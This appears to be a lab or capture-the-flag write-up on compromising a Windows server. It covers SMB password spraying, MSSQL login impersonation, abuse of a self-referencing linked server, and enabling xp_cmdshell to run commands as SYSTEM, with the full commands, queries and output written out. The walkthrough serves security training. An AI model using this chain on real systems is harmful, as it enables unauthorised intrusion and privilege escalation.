Skill Assessment - Attacking Common Services

Summary

This Hard skill assessment targets an internal Windows server (WIN-HARD) that manages files and hosts a Microsoft SQL Server instance. The attack chains a series of misconfigurations: a weak SMB credential leads to file share access, a password reused in a share exposes a second user, and MSSQL impersonation privileges combined with a self-referencing linked server ultimately yield SYSTEM-level command execution via xp_cmdshell.

💡 Box Info

IP: 10.129.203.10
OS: Windows Server 2019 (Build 17763)
Difficulty: Hard
Key Skills: SMB Enumeration, Password Spraying, MSSQL Impersonation, Linked Server Abuse

Reconnaissance

The brief describes an internal server used to manage files and working material, running an unknown database. An Nmap scan confirms the exposed services:

nmap output
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ Target_Name: WIN-HARD  (NetBIOS/DNS: WIN-HARD)
📊 Port Analysis
  • 445 (SMB): File shares — first foothold for user/file enumeration.
  • 1433 (MSSQL): SQL Server 2019 — the privilege-escalation surface.
  • 3389 (RDP): Interactive access once valid credentials are found.
  • Domain = WIN-HARD: Matches the hostname → standalone server, accounts are local (--local-auth).

SMB Enumeration & Simon

Given the username simon, a password spray against SMB finds a valid credential. Note the (Guest) tag — the server has guest fallback enabled, so this needs verifying, but the credential turns out to be genuine:

bash
netexec smb 10.129.203.10 -u simon -p pws.list --local-auth --ignore-pw-decoding
SMB  10.129.203.10  445  WIN-HARD  [+] WIN-HARD\simon:li***ol (Guest)

With the password confirmed, enumerate the readable shares:

smbmap
smbmap -u simon -p 'liverpool' -H 10.129.203.10

Disk        Permissions   Comment
----        -----------   -------
Home        READ ONLY
IPC$        READ ONLY     Remote IPC

The Home share contains department folders. Under IT/, each user has a personal directory:

smbclient
smbclient //10.129.203.10/home -U simon

smb: \> ls
  HR   IT   OPS   Projects

smb: \IT\> ls
  Fiona   John   Simon

smb: \IT\Simon\> ls
  random.txt        A       94

smb: \IT\john\> ls
  information.txt   A      101
  notes.txt         A      164
  secrets.txt       A       99
🔑 First Answer

The file belonging to Simon is random.txt. More importantly, John's folder contains a secrets.txt — a strong signal for the next stage.

Password Discovery — Fiona

Enumerating the retrieved files (and continued share access) surfaces a password for the user fiona. Confirm it against SMB:

bash
netexec smb 10.129.203.10 -u fiona -p creds.txt --local-auth
SMB  10.129.203.10  445  WIN-HARD  [+] WIN-HARD\fiona:48Ns***Sl

MSSQL Impersonation

With Fiona's credentials we authenticate to MSSQL. The critical enumeration step is checking which logins the current user is allowed to impersonate:

SQL — enumerate impersonation
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
  ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

name
-----
john
simon

Fiona can impersonate john. However, John alone cannot run xp_cmdshell directly on this instance — so we enumerate the registered linked servers:

SQL — linked servers
SELECT srvname, isremote FROM sysservers;

srvname                 isremote
---------------------   --------
WINSRV02\SQLEXPRESS            1
LOCAL.TEST.LINKED.SRV          0
⚠️ Impersonation vs Linked Servers

These are two different escalation paths. MSSQL refuses a linked-server call made while impersonating ("Linked servers cannot be used under impersonation without a mapping"). The self-referencing LOCAL.TEST.LINKED.SRV (isremote=0) is the interesting one — queries sent through it run in the link's own security context.

Linked Server & RCE

Sending a query through LOCAL.TEST.LINKED.SRV confirms the link executes as sysadmin:

SQL — verify context
EXECUTE('SELECT @@servername, @@version, system_user,
         is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV];
-- is_srvrolemember returns 1 → sysadmin on the far side

xp_cmdshell is disabled by default, so enable it through the link first. Inner single quotes are doubled because the whole statement travels as a string:

SQL — enable xp_cmdshell
EXEC ('sp_configure ''show advanced options'', 1') AT [LOCAL.TEST.LINKED.SRV];
EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV];
EXEC ('sp_configure ''xp_cmdshell'', 1') AT [LOCAL.TEST.LINKED.SRV];
EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV];

Now command execution works — and the context is nt authority\system:

SQL — command execution
EXEC ('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV];
output
-------------------
nt authority\system

With SYSTEM-level execution, the flag on the Administrator desktop is trivial to read:

SQL — locate the flag
EXEC ('xp_cmdshell ''dir C:\Users\Administrator\Desktop''') AT [LOCAL.TEST.LINKED.SRV];

 Directory of C:\Users\Administrator\Desktop
 04/21/2022  04:07 PM   27 flag.txt
🏆 SYSTEM Compromise

The chain is complete: simon → SMB files → fiona → impersonate john → linked-server sysadmin → xp_cmdshell as SYSTEM. Reading flag.txt from the Administrator desktop finishes the assessment.

🎯 Key Takeaways

  • Guest fallback: A [+] tagged (Guest) is not proof of a valid credential — verify before trusting it.
  • Standalone vs domain: When the domain name equals the hostname, accounts are local — use --local-auth.
  • MSSQL impersonation: IMPERSONATE grants are a direct privilege-escalation path; always enumerate them.
  • Linked servers: A self-referencing link can run as sysadmin. Impersonation and linked-server calls cannot be combined in one context.
  • Quote escaping: Statements sent via EXEC(...) AT [srv] need inner single quotes doubled ('').
  • xp_cmdshell as SYSTEM: The SQL service account is often highly privileged — enabling it can mean immediate SYSTEM.

Tools Used

  • nmap — service enumeration
  • netexec — SMB/MSSQL spraying
  • smbmap / smbclient — share access
  • impacket-mssqlclient — MSSQL interaction